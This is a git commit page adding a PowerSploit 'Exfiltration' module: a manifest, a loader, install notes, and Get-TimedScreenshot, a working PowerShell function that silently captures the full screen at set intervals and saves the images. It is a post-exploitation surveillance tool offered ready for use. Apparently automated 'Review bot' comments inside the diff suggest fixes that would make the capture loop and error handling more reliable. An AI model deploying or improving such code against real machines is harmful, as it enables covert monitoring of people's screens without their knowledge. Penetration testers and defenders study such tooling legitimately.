author | bitform <matt@exploit-monday.com> | 2013-01-20 21:32:41 -0500 |
---|---|---|
committer | bitform <matt@exploit-monday.com> | 2013-01-20 21:32:41 -0500 |
commit | b3bbe03e939f300c07169650b342e0665e578085 (patch) | |
tree | f642796a3d163e63eae0c2b9ff523325b21a9d8e | |
parent | b53b6a03a5d29a8145dc590d5945b41fe5ae07f7 (diff) | |
Added 'Exfiltration' Module
-rw-r--r-- | Exfiltration/Exfiltration.psd1 | 87 | ||||
-rw-r--r-- | Exfiltration/Exfiltration.psm1 | 1 | ||||
-rw-r--r-- | Exfiltration/Get-TimedScreenshot.ps1 | 99 | ||||
-rw-r--r-- | Exfiltration/Usage.md | 12 |
4 files changed, 199 insertions, 0 deletions
diff --git a/Exfiltration/Exfiltration.psd1 b/Exfiltration/Exfiltration.psd1
new file mode 100644
index 0000000..7eb9aa2
--- /dev/null
+++ b/Exfiltration/Exfiltration.psd1
@@ -0,0 +1,87 @@
+@{
+
+# Script module or binary module file associated with this manifest.
+ModuleToProcess = 'Exfiltration.psm1'
+
+# Version number of this module.
+ModuleVersion = '1.0.0.0'
+
+# ID used to uniquely identify this module
+GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'
+
+# Author of this module
+Author = 'Matthew Graeber'
+
+# Company or vendor of this module
+CompanyName = ''
+
+# Copyright statement for this module
+Copyright = 'BSD 3-Clause'
+
+# Description of the functionality provided by this module
+Description = 'PowerSploit Exfiltration Module'
+
+# Minimum version of the Windows PowerShell engine required by this module
+PowerShellVersion = '2.0'
+
+# Name of the Windows PowerShell host required by this module
+# PowerShellHostName = ''
+
+# Minimum version of the Windows PowerShell host required by this module
+# PowerShellHostVersion = ''
+
+# Minimum version of the .NET Framework required by this module
+# DotNetFrameworkVersion = ''
+
+# Minimum version of the common language runtime (CLR) required by this module
+# CLRVersion = ''
+
+# Processor architecture (None, X86, Amd64) required by this module
+# ProcessorArchitecture = ''
+
+# Modules that must be imported into the global environment prior to importing this module
+# RequiredModules = @()
+
+# Assemblies that must be loaded prior to importing this module
+# RequiredAssemblies = @()
+
+# Script files (.ps1) that are run in the caller's environment prior to importing this module.
+# ScriptsToProcess = ''
+
+# Type files (.ps1xml) to be loaded when importing this module
+# TypesToProcess = @()
+
+# Format files (.ps1xml) to be loaded when importing this module
+# FormatsToProcess = @()
+
+# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
+# NestedModules = @()
+
+# Functions to export from this module
+FunctionsToExport = '*'
+
+# Cmdlets to export from this module
+CmdletsToExport = '*'
+
+# Variables to export from this module
+VariablesToExport = ''
+
+# Aliases to export from this module
+AliasesToExport = ''
+
+# List of all modules packaged with this module.
+ModuleList = @(@{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'})
+
+# List of all files packaged with this module
+FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Usage.md'
+
+# Private data to pass to the module specified in RootModule/ModuleToProcess
+# PrivateData = ''
+
+# HelpInfo URI of this module
+# HelpInfoURI = ''
+
+# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
+# DefaultCommandPrefix = ''
+
+}
\ No newline at end of file
diff --git a/Exfiltration/Exfiltration.psm1 b/Exfiltration/Exfiltration.psm1
new file mode 100644
index 0000000..e5234fb
--- /dev/null
+++ b/Exfiltration/Exfiltration.psm1
@@ -0,0 +1 @@
+Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
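Review bot: The loader dot-sources every `*.ps1` found under `$PSScriptRoot`, so any script present in the module folder at import time runs in the importing session, not only the files this commit ships. The manifest already enumerates the shipped scripts in `FileList` but exports with `FunctionsToExport = '*'`, so an extra file would also widen the exported command set without any change to the manifest. Dot-sourcing an explicit list, e.g. `. (Join-Path $PSScriptRoot 'Get-TimedScreenshot.ps1')`, and setting `FunctionsToExport = 'Get-TimedScreenshot'` keeps what is loaded and exported tied to what was reviewed. A one-line comment such as `# Dot-source each function file shipped with this module` would help too, since the line relies on the `%` alias.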
\ No newline at end of file
diff --git a/Exfiltration/Get-TimedScreenshot.ps1 b/Exfiltration/Get-TimedScreenshot.ps1
new file mode 100644
index 0000000..3a19a7d
--- /dev/null
+++ b/Exfiltration/Get-TimedScreenshot.ps1
@@ -0,0 +1,99 @@
+Function Get-TimedScreenshot {
+<#
+.SYNOPSIS
+
+ Get-TimedScreenshot
+
+ Author: Chris Campbell (@obscuresec)
+ License: BSD 3-Clause
+
+.DESCRIPTION
+
+ A function that takes screenshots and saves them to a folder.
+
+.PARAMETER $Path
+
+ Specifies the folder path.
+
+.PARAMETER $Interval
+
+ Specifies the interval in seconds between taking screenshots.
+
+.PARAMETER $EndTime
+
+ Specifies when the script should stop running in the format HH-MM
+
+.EXAMPLE
+
+ PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00
+
+.LINK
+
+ http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html
+ https://github.com/obscuresec/random/blob/master/Get-TimedScreenshot
+
+#>
+
+ [CmdletBinding()] Param(
+ [Parameter(Mandatory=$True)]
+ [ValidateScript({Test-Path -Path $_ })]
+ [string] $Path,
+
+ [Parameter(Mandatory=$True)]
+ [int32] $Interval,
+
+ [Parameter(Mandatory=$True)]
+ [string] $EndTime
+ )
+
+ #Define helper function that generates and saves screenshot
+ Function GenScreenshot {
+ $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen
+ $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height
+ $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)
+ $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size)
+ $DrawingGraphics.Dispose()
+ $ScreenshotObject.Save($FilePath)
+ $ScreenshotObject.Dispose()
+ }
+
+ Try {
+
+ #load required assembly
+ Add-Type -Assembly System.Windows.Forms
+
+ Do {
+ #get the current time and build the filename from it
+ $Time = (Get-Date)
+
+ [string] $FileName = "$($Time.Month)"
+ $FileName += '-'
+ $FileName += "$($Time.Day)"
+ $FileName += '-'
+ $FileName += "$($Time.Year)"
+ $FileName += '-'
+ $FileName += "$($Time.Hour)"
+ $FileName += '-'
+ $FileName += "$($Time.Minute)"
+ $FileName += '-'
+ $FileName += "$($Time.Second)"
+ $FileName += '.png'
+
+ #use join-path to add path to filename
+ [string] $FilePath = (Join-Path $Path $FileName)
+
+ #run screenshot function
+ GenScreenshot
+
+ Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds"
+
+ Start-Sleep -Seconds $Interval
+ }
+
+ #note that this will run once regardless if the specified time as passed
+ While ((Get-Date -Format HH:%m) -lt $EndTime)
+ }
+
+ Catch {Write-Warning "$Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage"}
+
+}
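Review bot: The loop condition `(Get-Date -Format HH:%m) -lt $EndTime` is a string comparison and `%m` is the unpadded minute, so at 14:05 the left side is `14:5`, which sorts after `14:30` and stops the run early. An `-EndTime` typed as `9:30` sorts after every `HH:`-prefixed value, so the loop would keep writing files with no end. Comparing dates avoids both, `While ((Get-Date) -lt [datetime]$EndTime)`, ideally with `$EndTime` validated in the `Param` block; the help text also gives the format as HH-MM while the example passes `14:00`. Separately, the `Catch` string expands the whole `$Error` collection and prints `[0].ToString()` literally; `Write-Warning "$($_.ToString()) $($_.InvocationInfo.PositionMessage)"` would report the caught error. `GenScreenshot` also reads `$FilePath` from the caller's scope rather than taking it as a parameter, which deserves a comment or a `Param($FilePath)`.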
\ No newline at end of file
diff --git a/Exfiltration/Usage.md b/Exfiltration/Usage.md
new file mode 100644
index 0000000..dfdaabb
--- /dev/null
+++ b/Exfiltration/Usage.md
@@ -0,0 +1,12 @@
+To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
+
+The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
+The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
+
+To use the module, type `Import-Module Exfiltration`
+
+To see the commands imported, type `Get-Command -Module Exfiltration`
+
+For help on each individual command, Get-Help is your friend.
+
+Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
\ No newline at end of file |